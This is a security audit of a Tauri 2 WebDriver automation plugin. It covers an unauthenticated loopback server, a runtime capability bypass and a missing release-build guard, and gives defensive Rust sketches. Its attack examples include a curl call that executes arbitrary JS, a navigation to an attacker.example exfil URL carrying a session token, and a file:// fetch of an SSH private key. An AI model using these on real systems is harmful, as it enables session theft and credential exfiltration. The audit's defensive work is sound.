tauri-webdriver-automation (danielraffel) — Security Audit
What it is: Community Tauri 2 plugin that exposes a WebDriver-shaped HTTP server inside a debug-built Tauri app on macOS, plus a CLI (tauri-wd) that translates W3C WebDriver requests into the plugin’s protocol, plus an MCP server (mcp-tauri-automation) that lets agents drive the whole thing through a model.
Status: Live as of 2026-02. Small project (1 author, 16 stars, ~2 kLOC Rust, ~1.7 kLOC TS). Last commit on main: 2026-02-17.
Most relevant to Locara: It’s the only freely available option today for agent-driven Tauri testing on Apple Silicon (the official tauri-driver has no macOS support yet and CrabNebula’s driver is paywalled there), but it ships several patterns that conflict with Locara’s security stance. Audit verdict: re-implement, don’t vendor.
This note records the audit findings against the methodology. Audited commit: main HEAD as of 2026-05-07.
Plugin facts
| Field | Value |
|---|---|
| Repo | https://github.com/danielraffel/tauri-webdriver |
| License | MIT OR Apache-2.0 (vendor-OK) |
| LOC | plugin lib.rs 92 + server.rs 1804 + init.js ~135 ≈ 2030 LOC; CLI main.rs 1768 |
| Crate version | 0.1.3 |
| Last commit (main) | 2026-02-17 (≈2.5 months stale) |
| Open issues | 4 (incl. #4 — PoisonError self-termination on macOS) |
| Stars / forks | 16 / 2 |
| Plugin direct deps | axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2 (wry, dynamic-acl) |
| Bus factor | 1 (@danielraffel, AI-assisted per the README) |
| Companion MCP | danielraffel/mcp-tauri-automation — TS, MIT, fork of Radek44/mcp-tauri-automation, last push 2026-02-14 |
TL;DR
Re-implement, don’t vendor. Three load-bearing problems:
- The HTTP server is unauthenticated on a loopback TCP port — any local process gets RCE in the webview.
- The plugin bypasses the host app’s capability ACL by calling app.add_capability(...) at runtime with window("*") + remote http://* / https://* globs.
- The “debug-only” promise is a README convention, not a code-level kill-switch: there’s no #[cfg(not(debug_assertions))] compile_error!, so a release build accidentally including the dependency ships an open WebDriver server.
The agent-useful subset (click, type, eval, screenshot, invoke) is well under 500 LOC of axum + WebviewWindow::eval. Vendoring the upstream would inherit all three problems plus the v0.1.3 PoisonError reliability bug. We rebuild on Locara’s terms — Unix-socket transport, bearer-token auth, compile-time release-build guard, capability integration that respects the manifest, structured audit log.
Threat model — what an attacker can do
Against tauri-webdriver-automation running in a typical Tauri 2 dev environment:
Same-machine, different-process → Critical. Any local process running as the user (a malicious npm postinstall, a compromised VS Code extension, a Mac-malware sample) can curl -X POST http://127.0.0.1:<port>/script/execute -d '{"script":"...","args":[]}' and run arbitrary JS in your dev app’s webview. That JS can:
- Read DOM and exfil to the network (fetch).
- Call any Tauri command via window.__TAURI_INTERNALS__.invoke. The plugin’s runtime ACL bypass means window("*") is allowed, so even non-debug commands are reachable.
- Read file:// URLs if the host app’s app.security.assetProtocol allows it (default Tauri is restrictive but plugins commonly loosen this).
The port is broadcast on stdout (server.rs:1798 — println!("[webdriver] listening on port {}", port)); anything that captures the dev binary’s stdout (CI log uploads, screen-share, parent-process tee) leaks the port. Even without that leak, the loopback port range is ~64 k — scannable in seconds.
Same-LAN, browser tab → Probably blocked, but only by the browser. A host elsewhere on a coffee-shop network can’t connect to 127.0.0.1 itself, but a page it serves into the developer’s browser can make that browser send requests to localhost:<port>. The plugin sets no CORS headers and doesn’t validate Host or Origin. The plugin uses application/json POSTs, which trigger a preflight, and the missing Access-Control-Allow-Origin causes that preflight to fail in a normal browser. So a naive cross-origin attack fails, but it fails outside the plugin in CORS, not inside the plugin’s code. DNS rebinding is a known bypass: once the attacker’s hostname resolves to 127.0.0.1, the requests are same-origin, no preflight applies, and only a Host check (which the plugin lacks) would stop them. Native helpers, browser extensions with <all_urls> permission, and non-browser HTTP clients have no such mitigation either.
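For illustration, the Host validation the plugin omits could look like the sketch below. It assumes the server knows its own bound port; the function name host_is_loopback is hypothetical and does not exist upstream. A rebound request carries the attacker's hostname in Host, so an exact match against the loopback names rejects it.

```rust
/// Return true only when the Host header names the loopback listener itself.
/// Hypothetical helper: not part of the audited plugin.
fn host_is_loopback(host_header: Option<&str>, port: u16) -> bool {
    // A missing Host header is treated as a failed check.
    let Some(host) = host_header else {
        return false;
    };
    let host = host.trim().to_ascii_lowercase();
    // Exact matches only: no suffix or prefix matching, which rebinding could abuse.
    [
        format!("127.0.0.1:{}", port),
        format!("localhost:{}", port),
        format!("[::1]:{}", port),
    ]
    .iter()
    .any(|expected| *expected == host)
}
```

This check only narrows the browser-tab path. It does nothing against a local process, which can send any Host value it likes.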
Same-LAN, native client → No direct exposure. TcpListener::bind("127.0.0.1:0") doesn’t accept off-host connections.
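Production-build accident → Critical. If a downstream user adds the crate to [dependencies] unconditionally and forgets the #[cfg(debug_assertions)] wrap in main.rs, the release build ships a fully open WebDriver server. Cargo offers no shortcut here: [target.'cfg(debug_assertions)'.dependencies] does not work, because Cargo does not evaluate debug_assertions in target tables, so the only manifest-level guard is an optional dependency behind a feature. There is no compile-time, no env-var, no runtime check inside the plugin to prevent this.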
Findings
F1 — Loopback HTTP server is unauthenticated
server.rs:1795 — tokio::net::TcpListener::bind("127.0.0.1:0"). No bearer token, no shared secret, no Unix-socket peer credentials, no Authorization header check, no rate limit. Routes are bare POST /script/execute, POST /navigate/url, POST /cookie/add, etc.
Attacker class: same-machine.
Severity: Critical.
Mitigation if vendoring: require an Authorization: Bearer <token> header with a 32-byte random token generated at boot, written to a 0600-mode file in $XDG_RUNTIME_DIR. Better: drop TCP entirely, switch to a Unix domain socket with peer-credential check (SO_PEERCRED on Linux, LOCAL_PEERCRED on macOS).
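A minimal sketch of the token half of this mitigation, using only the standard library. It assumes /dev/urandom as the randomness source (present on macOS and Linux) and leaves the file location to the caller. All function names are hypothetical.

```rust
use std::fs::{File, OpenOptions};
use std::io::{self, Read, Write};
use std::os::unix::fs::OpenOptionsExt;
use std::path::Path;

/// Read 32 random bytes from the OS and hex-encode them (64 hex characters).
/// Assumption: /dev/urandom exists on the target platform.
fn generate_token() -> io::Result<String> {
    let mut bytes = [0u8; 32];
    File::open("/dev/urandom")?.read_exact(&mut bytes)?;
    Ok(bytes.iter().map(|b| format!("{:02x}", b)).collect())
}

/// Create the token file with mode 0600. `create_new` refuses to reuse an
/// existing file, so a pre-planted file or symlink makes this fail.
fn write_token_file(path: &Path, token: &str) -> io::Result<()> {
    let mut file = OpenOptions::new()
        .write(true)
        .create_new(true)
        .mode(0o600)
        .open(path)?;
    file.write_all(token.as_bytes())
}

/// Compare two byte strings without returning early on the first mismatch.
fn constant_time_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

/// Check an Authorization header value against the expected token.
fn is_authorized(header: Option<&str>, expected: &str) -> bool {
    match header.and_then(|h| h.strip_prefix("Bearer ")) {
        Some(presented) => constant_time_eq(presented.as_bytes(), expected.as_bytes()),
        None => false,
    }
}
```

In a real server the is_authorized check would sit in middleware in front of every route, so no handler can be reached without it.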
F2 — #[cfg(debug_assertions)] is a README convention, not enforced in code
lib.rs::init() has zero cfg gates. The plugin will happily start the server in a release binary. The protection — wrapping app.plugin(tauri_plugin_webdriver_automation::init())? in #[cfg(debug_assertions)] — has to happen at the call site, in the consumer’s main.rs, where it is one missed wrap away from shipping.
Attacker class: production-build accident.
Severity: Critical.
Mitigation if re-implementing:
// crates/locara-automation/src/lib.rs (top of file)
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds. \
    Make the dependency optional in Cargo.toml behind a feature that \
    release builds leave off, or enable the explicit \
    `force-enable-automation` feature flag.");
Plus a runtime check on LOCARA_AUTOMATION=1. If unset, the plugin’s init() returns success but never opens the surface. Defense in depth: the build fails and the runtime refuses to start.
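The runtime half of that guard can be sketched as follows. The decision is kept in a pure function so it can be tested without touching the process environment. The Startup enum and the init_automation wrapper are hypothetical stand-ins for the plugin's real init(), which would start the server where this sketch calls `start`.

```rust
use std::env;

/// Only the exact value "1" enables the surface; unset, empty, or anything
/// else leaves it closed.
fn automation_enabled(value: Option<&str>) -> bool {
    value == Some("1")
}

/// Read the gate from the process environment.
fn automation_enabled_from_env() -> bool {
    automation_enabled(env::var("LOCARA_AUTOMATION").ok().as_deref())
}

/// Outcome of plugin start-up. Both variants count as success for the host app.
#[derive(Debug, PartialEq)]
enum Startup {
    Disabled,
    Started,
}

/// Hypothetical stand-in for init(): run `start` only when the gate is open.
fn init_automation(enabled: bool, start: impl FnOnce()) -> Startup {
    if !enabled {
        return Startup::Disabled;
    }
    start();
    Startup::Started
}
```

A caller would pass automation_enabled_from_env() as the first argument. Treating the disabled case as success keeps a dev build usable when the variable is unset.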
F3 — Plugin self-grants a permissive capability that overrides tauri.conf.json
lib.rs:60-66:
app.add_capability(
    tauri::ipc::CapabilityBuilder::new("webdriver-automation")
        .local(true)
        .window("*")
        .remote("http://*".into())
        .remote("https://*".into())
        .permission("webdriver-automation:default"),
)?;
window("*") allows any window. The two remote("http://*") / remote("https://*") globs allow any http/https origin loaded into a webview to call plugin:webdriver-automation|resolve. The resolve callback is invoked from the plugin’s own injected init.js, not from remote pages, so the remote globs are gratuitous — they only expand the IPC attack surface.
Attacker class: any page loaded into the webview (in scope for apps that allow remote content).
Severity: High.
Mitigation if re-implementing: ship a permissions/automation.toml and require the host app to opt in via its own tauri.conf.json capability allowlist. Tighten window scope to a specific automation window label. Drop the .remote() globs entirely.
F4 — script_execute is a thin shell over webview eval
server.rs:755-765 — request body’s script is wrapped into (function(){ ... }).apply(null, __args) and passed straight to WebviewWindow::eval. No allowlist, no sandboxing, no audit log of what JS ran.
This is by design — it’s the agent surface — but combined with F1, anyone speaking to the loopback port can do anything the page can.
Attacker class: same-machine (gated by F1 if F1 is fixed).
Severity: High (as a primitive). Acceptable if and only if F1 is mitigated and an audit log is added.
Mitigation if re-implementing: keep the eval primitive (we need it), but wrap it in:
- bearer-token / unix-socket auth (closes F1),
- structured append-only audit log (timestamp, route, caller PID via SO_PEERCRED, body hash, response shape),
- compile-time release-build kill-switch (closes F2).
F5 — navigate_url accepts arbitrary URLs
server.rs:834+ — driver can drive the webview to any URL. Combined with F1, an attacker can pivot the webview to https://attacker.example/exfil?token=... carrying the user’s session.
Attacker class: same-machine.
Severity: Medium (high if combined with F1 unfixed).
Mitigation: allowlist the navigation targets to tauri://, data:, and explicitly-permitted origins.
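One way such an allowlist could be checked is sketched below with the standard library only. The function name and the exact-origin matching rule are assumptions; a real implementation would more likely parse with a dedicated URL library. Anything that does not match is refused.

```rust
/// Decide whether the automation surface may navigate the webview to `url`.
/// `allowed_origins` holds exact origins such as "https://app.example.com"
/// (scheme + host + optional port, no trailing slash). Hypothetical helper.
fn is_allowed_navigation(url: &str, allowed_origins: &[&str]) -> bool {
    let lower = url.to_ascii_lowercase();
    // Schemes the note allows unconditionally.
    if lower.starts_with("tauri://") || lower.starts_with("data:") {
        return true;
    }
    // Everything else must look like scheme://authority[/...].
    let Some((scheme, rest)) = lower.split_once("://") else {
        return false;
    };
    if scheme != "http" && scheme != "https" {
        return false;
    }
    // The authority ends at the first path, query, or fragment delimiter.
    // Backslash is included because browsers treat it like '/' here.
    let end = rest
        .find(|c: char| matches!(c, '/' | '?' | '#' | '\\'))
        .unwrap_or(rest.len());
    let authority = &rest[..end];
    // Reject userinfo tricks such as https://trusted.example@attacker.example/
    if authority.is_empty() || authority.contains('@') {
        return false;
    }
    let origin = format!("{}://{}", scheme, authority);
    allowed_origins.iter().any(|o| o.eq_ignore_ascii_case(&origin))
}
```

The match is deliberately strict: an explicit default port (for example :443) will not match an allowlist entry written without it, which errs on the side of refusing.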
F6 — fetch('file://...') gated only by WKWebView config
The plugin doesn’t tighten app.security.assetProtocol. If the host app loosens it for asset loading, the WebDriver caller can read arbitrary files via fetch('file:///Users/you/.ssh/id_rsa').
Attacker class: same-machine (same as F1).
Severity: High (in apps that allow file:); inert otherwise.
Mitigation if re-implementing: require strict assetProtocol and dangerousDisableAssetCspModification = false whenever automation is enabled; refuse to start otherwise.
F7 — expect/unwrap-heavy mutex locking
server.rs and lib.rs use .lock().expect("...") extensively (pending_scripts, frame_stack, current_window_label). Issue #4 confirms a PoisonError self-terminates tauri-wd on macOS in v0.1.3 after a few sequential tests.
Attacker class: none directly — but reliability bugs of this shape are the difference between “tests pass once then deadlock” and “tests are dependable.”
Severity: Medium (reliability).
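Mitigation if re-implementing: RwLock over Mutex where possible (RwLock poisons the same way, so the same handling applies), try_lock()-with-recovery on critical paths, structured panic-to-error conversion at task boundaries. Replace every .expect("lock poisoned") with let Ok(g) = m.lock() else { return Err(ServerError::Poisoned); }; so a poisoned lock becomes an error response instead of a second panic.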
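A small sketch of the two poison-handling options, using std::sync::Mutex. The ServerError type and the function names are hypothetical, and the map's value type is simplified to String. The poison helper exists only to reproduce the failure: it panics in another thread while holding the lock.

```rust
use std::collections::HashMap;
use std::sync::{Arc, Mutex};

#[derive(Debug, PartialEq)]
enum ServerError {
    Poisoned,
}

type Pending = Mutex<HashMap<u64, String>>;

/// Strict variant: report poisoning as an error the handler can map to a 500.
fn pending_count(pending: &Pending) -> Result<usize, ServerError> {
    let Ok(guard) = pending.lock() else {
        return Err(ServerError::Poisoned);
    };
    Ok(guard.len())
}

/// Recovering variant: take the guard out of the PoisonError and carry on.
/// Reasonable only when the protected data has no invariant that a
/// half-finished update could have broken.
fn pending_count_recovering(pending: &Pending) -> usize {
    let guard = pending.lock().unwrap_or_else(|poisoned| poisoned.into_inner());
    guard.len()
}

/// Demonstration helper: poison the mutex by panicking while holding it.
fn poison(pending: &Arc<Pending>) {
    let shared = Arc::clone(pending);
    let _ = std::thread::spawn(move || {
        let _guard = shared.lock().unwrap();
        panic!("simulated handler panic");
    })
    .join();
}
```

With .expect() in place of either variant, the first request after the simulated panic would itself panic, which matches the self-termination described in issue #4.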
F8 — Stdout port disclosure
server.rs:1798 — println!("[webdriver] listening on port {}", port);. Anything reading the binary’s stdout (CI log uploads, tee’d dev terminals, screen-share, parent-process capture) leaks the port. With F1 unfixed, this is a one-shot RCE for any process that captured a CI log.
Attacker class: same-machine + log-leak.
Severity: Low alone, High when combined with F1.
Mitigation if re-implementing: Unix socket eliminates the port. Token (if we still expose one) goes to a 0600-mode file readable only by the same UID, never to stdout.
F9 — tauri-wd CLI launches arbitrary binaries
main.rs:319 — tokio::process::Command::new(&binary) where binary comes from W3C session capabilities tauri:options.binary. Anyone speaking to the CLI on :4444 can execute any binary on disk.
Attacker class: same-machine (against the test runner, not the plugin).
Severity: High if we ship the MCP companion. Inert if we don’t.
Decision: don’t ship the MCP companion. Locara’s automation is wired directly into the locara CLI; we don’t need a separate WebDriver-shaped CLI.
F10 — Dependency surface is clean (positive finding)
axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2. All actively maintained, no yanked versions, no open cargo audit advisories of note. No unsafe in plugin source. No supply-chain finding. The risk is in the plugin’s own design, not its deps.
What the plugin gets right (worth porting)
- __WEBDRIVER__ JS bridge pattern: js_init_script injects a small client-side helper that exposes window.__WEBDRIVER__.resolve(id, value) → a tokio::sync::oneshot on the Rust side. Clean, low-overhead, parameter-safe (the script body is the only stringy bit). Rename to __LOCARA__ for ours.
- pending_scripts: Mutex<HashMap<id, oneshot::Sender>> lifecycle. Request comes in, generates UUID, writes to map, eval’s the script with the UUID, JS resolves with the UUID, Rust pulls the sender from the map and replies. Replace expect() with poisoned-recovery; otherwise port intact.
- on_webview_ready broadcast: start the automation server only after at least one webview exists, so eval always has somewhere to land. Useful pattern.
- Single-binary debug-only philosophy: the intent is right; we just enforce it in code instead of README.
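The pending_scripts lifecycle from the list above can be sketched with the standard library alone. This is a stand-in, not the upstream code: std::sync::mpsc replaces tokio::sync::oneshot, a counter replaces the UUID, and the PendingScripts type and its methods are hypothetical names.

```rust
use std::collections::HashMap;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::mpsc::{channel, Receiver, Sender};
use std::sync::Mutex;

/// Map from request id to the channel the waiting HTTP handler listens on.
struct PendingScripts {
    next_id: AtomicU64,
    waiting: Mutex<HashMap<u64, Sender<String>>>,
}

impl PendingScripts {
    fn new() -> Self {
        PendingScripts {
            next_id: AtomicU64::new(1),
            waiting: Mutex::new(HashMap::new()),
        }
    }

    /// Step 1: a request arrives. Allocate an id, park a sender in the map,
    /// and hand back the receiver. The id is what gets embedded in the
    /// evaluated script. Returns None if the lock is poisoned.
    fn register(&self) -> Option<(u64, Receiver<String>)> {
        let id = self.next_id.fetch_add(1, Ordering::Relaxed);
        let (tx, rx) = channel();
        self.waiting.lock().ok()?.insert(id, tx);
        Some((id, rx))
    }

    /// Step 2: the JS bridge calls resolve(id, value). Remove the sender so
    /// each id can be resolved at most once, then deliver the value.
    fn resolve(&self, id: u64, value: String) -> bool {
        let Ok(mut waiting) = self.waiting.lock() else {
            return false;
        };
        match waiting.remove(&id) {
            Some(tx) => tx.send(value).is_ok(),
            None => false,
        }
    }
}
```

Removing the entry on resolve is what keeps a replayed or forged id from delivering a second value to a handler that has already answered.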
Re-implementation sketch — crates/locara-automation
Target: <500 LOC Rust + ~80 LOC JS. No new direct dependencies beyond the crates Locara already pulls in (axum, tokio, serde, serde_json, tauri, uuid, tracing).
crates/locara-automation/
    Cargo.toml            # debug-only feature, version pinned to workspace
    permissions/
        automation.toml   # opt-in capability, host-app declares
        default.toml      # the single permission `automation:resolve`
    src/
        lib.rs            # plugin entry, compile-time guard, capability registration
        server.rs         # axum router on a Unix socket, ~250 LOC
        auth.rs           # bearer-token middleware, token file lifecycle
        audit.rs          # append-only JSONL log, ~80 LOC
        init.js           # __LOCARA__ bridge, mirror of upstream init.js
Transport: tokio::net::UnixListener::bind("$XDG_RUNTIME_DIR/locara-automation-<pid>.sock") with 0o600. Closes F1, F8 in one move.
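A sketch of the bind step follows. It uses std::os::unix::net::UnixListener rather than the tokio listener named above, so that it stays self-contained. The helper names are hypothetical, and the runtime directory is passed in by the caller.

```rust
use std::fs;
use std::io;
use std::os::unix::fs::PermissionsExt;
use std::os::unix::net::UnixListener;
use std::path::{Path, PathBuf};

/// Build the per-process socket path inside the caller-supplied runtime dir.
fn socket_path(runtime_dir: &Path, pid: u32) -> PathBuf {
    runtime_dir.join(format!("locara-automation-{}.sock", pid))
}

/// Bind the socket, then restrict the socket file to its owner (mode 0600).
/// bind() fails if the path already exists, so a stale or squatted path is
/// reported as an error instead of being silently replaced.
fn bind_private_socket(path: &Path) -> io::Result<UnixListener> {
    let listener = UnixListener::bind(path)?;
    fs::set_permissions(path, fs::Permissions::from_mode(0o600))?;
    Ok(listener)
}
```

There is a short window between bind and set_permissions in which the default mode applies. Placing the socket inside a directory that is already mode 0700 closes that window.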
Auth: ephemeral 32-byte bearer token, written to $XDG_RUNTIME_DIR/locara-automation-<pid>.token mode 0o600. The Locara CLI reads the path from $XDG_RUNTIME_DIR (or from a structured handshake message on the socket itself), never from stdout.
Compile-time guard (F2):
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds");
Runtime guard: init() checks LOCARA_AUTOMATION=1; if unset, returns Ok without starting the server. The Locara CLI sets this when it spawns the dev shell.
Capability integration (F3): never call add_capability at runtime. Ship permissions/automation.toml; require the consumer to add automation:default to their own capability allowlist. Locara apps already have capability declarations in their manifests — this is the same path.
IPC shape (six routes, agent-useful subset):
POST /eval { window, script } → { value }
POST /click { window, selector, index } → { ok }
POST /type { window, selector, text } → { ok }
POST /screenshot { window } → { png_b64 }
POST /invoke { window, command, payload } → { value }
POST /navigate { window, url } → { ok }
That’s it. No frames, no shadow DOM, no cookies, no alerts. Add when an actual recipe needs it.
Lifecycle: start the server in setup() after on_webview_ready. Store the JoinHandle in plugin state. Abort on RunEvent::Exit. Refuse to start if a sibling locara-automation-*.sock already exists for the same UID + bundle ID (prevents accidental double-launch attacks).
Audit log (mandatory): every request writes a line to ~/Library/Logs/Locara/automation-<date>.jsonl:
{"ts":"2026-05-07T19:14:22Z","route":"/eval","caller_pid":12345,"caller_uid":501,"body_sha256":"…","response_shape":"value","ms":14}
Append-only, log-rotated daily.
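A minimal sketch of writing one such line, assuming the caller supplies the timestamp and the body digest as strings (the standard library has neither a clock formatter nor SHA-256). The AuditEntry struct and function names are hypothetical; a real implementation would likely serialize with serde_json, which Locara already depends on.

```rust
use std::fs::OpenOptions;
use std::io::{self, Write};
use std::path::Path;

/// One audit record; field names follow the example line above.
struct AuditEntry<'a> {
    ts: &'a str,          // RFC 3339 timestamp, supplied by the caller
    route: &'a str,
    caller_pid: u32,
    caller_uid: u32,
    body_sha256: &'a str, // hex digest, computed by the caller
    response_shape: &'a str,
    ms: u64,
}

/// Minimal JSON string escaping: quotes, backslashes, control characters.
fn json_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

/// Render the entry as a single JSON object with no trailing newline.
fn audit_line(e: &AuditEntry) -> String {
    format!(
        "{{\"ts\":\"{}\",\"route\":\"{}\",\"caller_pid\":{},\"caller_uid\":{},\"body_sha256\":\"{}\",\"response_shape\":\"{}\",\"ms\":{}}}",
        json_escape(e.ts),
        json_escape(e.route),
        e.caller_pid,
        e.caller_uid,
        json_escape(e.body_sha256),
        json_escape(e.response_shape),
        e.ms
    )
}

/// Append one line to the log, creating the file if needed.
fn append_audit(path: &Path, e: &AuditEntry) -> io::Result<()> {
    let mut file = OpenOptions::new().create(true).append(true).open(path)?;
    writeln!(file, "{}", audit_line(e))
}
```

Opening with append(true) means every write lands at the end of the file, so lines already written are never overwritten by this code path.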
Mutex discipline (F7): RwLock for read-mostly state (the pending_scripts map). try_lock + structured error on contention. Every panic at a task boundary is converted to a 500 Internal Error in the response, never propagates.
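The panic-to-500 conversion can be sketched with std::panic::catch_unwind. This is a stand-in under stated assumptions: in the tokio-based server a panicking task would instead surface as an error when its JoinHandle is awaited. The run_guarded name and the (status, body) tuple are hypothetical.

```rust
use std::panic::{catch_unwind, AssertUnwindSafe};

/// Run a request handler and turn a panic into a 500 response instead of
/// letting it unwind further. Returns (status code, response body).
fn run_guarded<F: FnOnce() -> String>(handler: F) -> (u16, String) {
    // AssertUnwindSafe: this sketch assumes the handler leaves no shared
    // state half-updated when it panics; poisoned locks are handled separately.
    match catch_unwind(AssertUnwindSafe(handler)) {
        Ok(body) => (200, body),
        Err(_) => (500, "internal error".to_string()),
    }
}
```

The response body is deliberately generic. The panic payload belongs in the server's own logs, not in a reply to the caller.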
Closes F4-F6, F8-F9 by construction: F4 (eval surface) is wrapped by F1+F2 mitigations and the audit log. F5 (navigate) is allowlisted. F6 (file://) is precondition-checked at startup. F8 (stdout) is gone — Unix socket. F9 (CLI binary launching) is out of scope — we don’t ship the WebDriver CLI.
Effort: 1-2 days of focused work for the plugin + a Bun runner that talks to the socket. Recipes from tools/probe-ui port nearly unchanged because they already use the Probe handle abstraction; a thin adapter from Probe → automation-socket replaces the Playwright bits.
Specific learnings for Locara
- The fact that an unauthenticated, ACL-bypassing, README-gated WebDriver plugin is the best available option for agent-driven Tauri testing on macOS is itself a useful signal. The space is wide open. Locara should treat agent-driven E2E as a product feature, not a third-party dependency. Owning the surface is consistent with our security positioning and removes a long-term supply-chain risk.
- Patterns to copy from upstream: js_init_script + oneshot::channel resolve mechanism, on_webview_ready broadcast, request-id-routed scripts. These are well-shaped.
- Patterns to discard: TCP-bind, runtime add_capability, README-only cfg gating, port disclosure on stdout, expect()-heavy mutex locking, MCP companion binary launcher.
- Defense in depth means three layers: (a) compile-time compile_error! blocks release builds, (b) runtime env-var gate refuses to open the surface, (c) Unix socket + bearer token blocks anything that gets past (a) and (b).
- Audit logs aren’t optional for RCE-shape primitives. A surface that can eval JS in a webview must have a structured, append-only, on-disk record of every call. The reason isn’t blame; it’s that when something goes wrong, you need the data.
- Re-implementation cost is small (~500 LOC). Less than the audit cost of vendoring upstream and maintaining a security-fixed fork over time. The decision is structural, not heroic.
- tauri-driver (official) and CrabNebula’s @crabnebula/tauri-driver are also options, but the official driver is [Todo] on macOS, so a non-starter today, and CrabNebula is paywalled for macOS. Build our own.
- Update notes/tauri.md cross-reference when this lands: Locara’s testing primitive is a Tauri plugin, not a third-party tool. Same trust boundary.
References
- danielraffel/tauri-webdriver: the audited plugin.
- lib.rs (head, 60-66 capability bypass)
- server.rs (head, 1795 bind / 755 eval shell)
- init.js (JS bridge pattern)
- Issue #4: PoisonError reliability bug
- Author’s background article
- @danielraffel/mcp-tauri-automation: companion MCP server.
- Tauri 2 security model: the trust boundary the plugin lives inside.
- Tauri 2 plugin development: Builder, setup, invoke_handler lifecycle for the re-implementation.
- Tauri 2 WebDriver story (official): confirms macOS gap.
- Tauri team discussion #3768, Rust-side E2E patterns: thirtyfour, mock IPC, macOS unsolved.
- notes/tauri-plugin-security-methodology.md: the audit checklist this note follows.